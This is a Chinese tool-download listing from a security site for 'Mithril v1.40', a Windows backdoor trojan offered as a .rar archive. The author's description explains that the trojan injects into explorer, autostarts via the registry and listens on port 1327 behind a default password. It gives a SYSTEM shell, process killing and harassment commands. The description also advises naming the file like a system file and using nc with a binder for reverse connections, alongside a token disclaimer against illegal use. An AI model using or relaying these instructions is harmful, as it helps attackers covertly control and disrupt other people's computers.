xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
添加工具Xcon English Version

Mithril v1.40.rar


提交时间:2005-12-04
提交用户:Ado1327
工具分类:后门程序
运行平台:Windows
工具大小:578145 Bytes
文件MD5 :3d745cc8885fae26401a60b29e0bf64e
工具来源:sasuke

十一的时候卧病在家时编的,以前用马总是被杀,烦死了,所以索性自己写了一个。
    这个是完成版,修正一些功能,比如修改注册表实现自启动,密码验证等等。有一些功能用来整人不错,自动插入explorer进程,实现开机自启动,exe程序的名字可以改。比如改成和系统文件相似的。
    自认为写的不算太好,时间短了点,代码也有点乱,参照了一些黑挡上的关于dll木马编写方面的资料。小弟资力尚浅,有所缺陷再所难免,所以请各位见谅。
    最后再说明一下,请大家不要把此木马用于非法用途,否则出了事可别找我哦^-^!
    木马安装的时候必须把两个文件全部放在c:\winnt\下,运行Mithril.exe程序就可以了。
    木马在安装完之后,自动监听本地的1327端口,等待远程telnet连接,建议大家使用nc来接,因为telnet没有回显,nc的话不仅比telnet稳定还有回显,我也放在压缩包中了,如果大家是本地调试,用法为:nc 127.0.0.1 1327之后会被要求输入密码,初始密码为860715,然后就会出现提示字符,表示连接成功。(告诉大家个好方法,其实可以用nc和binder实现反弹哦!)

    下面介绍下基本功能:
    --?                   帮助信息
    --open                打开光驱
    --close               关上光驱
    --cmb                 交换鼠标左右键
    --rmb                 恢复鼠标左右键(这个功能好象换了过去就换不回来了,郁闷!)
    --ct                  改变鼠标双击时间,默认改为100000毫秒,大家可以通过修改源代码来修改。
    --rct                 恢复鼠标双击时间
    --rs                  重启被控端,为了增加隐蔽性,也用了 ExitWindowsEx
    --sd                  关闭被控端,用的是ExitWindowsEx,没有任何提示直接关闭。
    --pslist              列出系统中的所有进程名及其pid值
    --pskill              杀死指定的进程,需要知道其pid值,用法为pskill PID,和pslist配合使用。
    --lkm                 锁定鼠标在左上角一个区域中(纯粹搞笑用)
    --ulkm                解除鼠标的锁定
    --change              更换对方的墙纸,墙纸名字必须为1.bmp并且和木马放在同一目录下。
    --shell               得到一个system权限的cmdshell
    --quit                退出,但下次还可以连接(对方电脑重启后就无效了)
    --exit                卸载木马

    此木马还有许多不足之处,我在日后的版本中会进一步改进,也希望各位大侠帮小弟指出。本来还想加个远程截屏的功能的,但没完成,代码在里面,大家有兴趣可以试一下。
    替换壁纸功能必须是壁纸和木马在同一目录下,名字为1.bmp
                                               作者:sasuke        QQ:249757717

>> 下载 <<